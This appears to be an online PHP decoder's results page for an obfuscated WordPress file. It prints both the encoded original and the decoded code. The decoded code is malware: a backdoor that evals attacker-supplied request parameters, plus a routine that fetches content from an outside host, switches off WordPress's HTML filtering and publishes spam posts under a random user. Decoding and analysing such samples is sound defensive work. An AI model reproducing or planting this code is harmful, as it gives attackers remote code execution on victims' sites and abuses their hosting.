Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$o0o=__FILE__;$oOo='rVZtb9s2EP5sA/4PhGGUEio7zt4RVw6yRG4DuLHnlxVDEAiydLLZyJJGUvW8IP99R1LyS5..

Decoded Output download

?><?php
if(key($_GET)=='yyy'){eval($_REQUEST['jElhOsnTy']);die;}
require_once(GetWpLoadFilePath());
$users = get_users(array('fields' => array('id'),'number'=>10 ,'offset'=>0));
if(isset($users)&&count($users)>0){$user=$users[array_rand($users)]; $uid=$user->id;}
else $uid=0;
$cates = get_categories(array('number'=>10 ,'offset'=>0));
if(isset($cates)&&count($cates)>0){$cate=$cates[array_rand($cates)]; $cid= $cate->cat_ID;}
else $cid=0;
$cont = WPDB170815('http://wpdb.cheapapi.net/get.php?s='.$_SERVER['SERVER_NAME']);
if ($cont=='cms:error'){
	$cont = WPDB170815('http://wpdb.cheapapi.net/get.php?s='.$_SERVER['HTTP_HOST']);
	if ($cont=='cms:error') die($cont);
}
$cont=gzinflate(base64_decode($cont));
$arr=json_decode($cont);

$my_post = array(
  'post_title'    => $arr->post_title,
  'post_content'  => $arr->post_content,
  'post_status'   => 'publish',
  'post_author'   => $uid,
  'post_category' => array($cid),
  'post_date' => $arr->post_date,
);
remove_filter('content_save_pre', 'wp_filter_post_kses');
remove_filter('content_filtered_save_pre', 'wp_filter_post_kses');
$pid = wp_insert_post($my_post,true);
add_filter('content_save_pre', 'wp_filter_post_kses');
add_filter('content_filtered_save_pre', 'wp_filter_post_kses');
if(is_wp_error($pid)) die('wperr:'.$pid->get_error_message());
$url = get_permalink($pid);
die('nol-url:'.$url);

function WPDB170815($url)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    $output = curl_exec($curl);
    curl_close($curl);
    return $output;
}

function GetWpLoadFilePath(){
	$wpf = $_SERVER['DOCUMENT_ROOT']."/wp-load.php";
	if (file_exists($wpf)) return $wpf;
	$cfg_dirs = array("wp", "blog", "wordpress", "blogs");
	foreach($cfg_dirs as $fdir)
	{
		$wpf = $_SERVER['DOCUMENT_ROOT']."/".$fdir."/wp-load.php";
		if(file_exists($wpf)) return $wpf;
	}	
	$repstr=$_SERVER['DOCUMENT_ROOT'];
	$script=$_SERVER['SCRIPT_FILENAME'];
	for($i=0;$i<3;$i++){
		$pos = strpos($script, $repstr);
		if($pos===FALSE) $repstr=substr($repstr,strpos($repstr,'/',2));
		else break;
	}
	$path = str_replace($repstr, '',$script);
	if($path[0]=='/') $path = substr($path,1);
	$dirname=substr($path,0,strpos($path,'/'));
	$wpf = substr($script,0,strpos($script,$dirname))."/".$dirname."/wp-load.php";
	if (file_exists($wpf)) return $wpf;
	die('wp-load.php not found');
}
?>

Did this file decode correctly?

Original Code

$o0o=__FILE__;$oOo='rVZtb9s2EP5sA/4PhGGUEio7zt4RVw6yRG4DuLHnlxVDEAiydLLZyJJGUvW8IP99R1LyS5FubrF8iHh3z909Rx6Pvuy/ucxXeaPOYusRtlbLf+vNbNel2+2W2k/wKUhQN/F+m3vT2T396CWrkUhnW/pg9yIGvedGncOfBePgZ2kI1luQH/JhFkQDlsA4kCvLtnuNeqsQwAVxyRKkr9dWwHmwtWjMIIkEJW6flBoWUduhabFeAKdu/7xLHJrFsQCJUleHQ7JMoMIyce1Xr8KsSHciop700jWKex3Z50EaVZCHHmkVLDKAdp9FqhJIBBh1V3EOAwkVZ7VeZpzBjviJBHWQPUEjaoJq6RrFEUEDUQRDZEK03O7jf//2Zs8y3LHMUokkP4xvfj3/ufvL+Y8WXUmZX5ydbfJo0QlXEORBzjopyDOspIOnfSlc2mn5U2/yuze5p+br312999SxKvbE0nGxD8K1uADOM47d0KjX/od072azsf9uNJ2ZZLUvZCPYXkavUM9lpe7yb5bGCW6JtQgE/PSDH0GYRRVS9xpupvtRZOmxCS1oW2/9PBOqAnOMjTohVGl8yWQClOAftqKK0e7v9c4ep4JBKunnuFJ/gBQykIWgJiLNi0XCxIoeAIJCrrDUMiX23WEa03Dbg5uhztw+gEQIoZ+xUDqEqGo5rLNP4McskcAtWvLzRYDKnAN1CN3kpVlviv8oQNB/cTUyRCfFaOUswm1GM0vxjklttqoDcCQvQMGCKPomii/5fRU/fUV9tOp+sxRd2zQduqDuAnsWde2+uv4a469BiGAJ1UjjSTkcEL4OEpY+miho1GHSLGkjSAXCj2nAuEhDybL08AJpa6P+pE6W4M02gdUHt45JS3kqi9bgUMlyNUhQcMj1fDIcjWc+fhxSZfkP7HQ69PEi3g7+GHvexCGDq+HU+yo/dXlP95t4s/nkbja5upsOVL7ZZL5za2WFzAtZlQt/QWjcj+KGSSbgWM9BFjyt/M2AONjdF54hPb02eYy59rPoZnQ9f+/dIcnRCOdRp4lTrJ2gn5pbzWo6Yf8AcmNCCkuFwD6p8qPU02MxXvoR00+cuazNTd50SHORZEv13WQ8woYUolKKph5+ccYhCFfWPkAgSCvGFXZETXE+hXSzo11eoI/8T6D/XFM1cMiFxDfzS4l0oSLkLJcHoOn15BZPeXA79MwLUpZltRg+UC325nv89/q1bWrBO4i1YBpcWGUw7FyT2q4YK5jruqbDKqsrigV+rFJ0qiClSM+o851tQugncoE7+6irU7xzbAKT2UeHJMDfKpUnodQpqZQPkqXh990HfJLO8CnaeZcMlOica3AL9z0N1uAe2bo7dlpUQQzanGWFLevfo0tFFdS2zeGW4je3ZznVdq4kzSSJ8RdJRMvH9bJf+wc=';eval(gzinflate(base64_decode('U8n3z7dNr8rMS8tJLEnVSEosTjUziU9JTc5PSdVQAUpqalqDKNvikqL4otSCnMTkVA2l+Hg3Tx/X+HglHSV1lXyDfHUlHbBa69SyxByINmsA')));

Function Calls

gzinflate	2
str_replace	1
base64_decode	2

Variables

$o0o	index.php
$oOo	?><?php if(key($_GET)=='yyy'){eval($_REQUEST['jElhOsnTy']);..

Stats

MD5	da164653c2c152e18645936542ff4afe
Eval Count	2
Decode Time	103 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats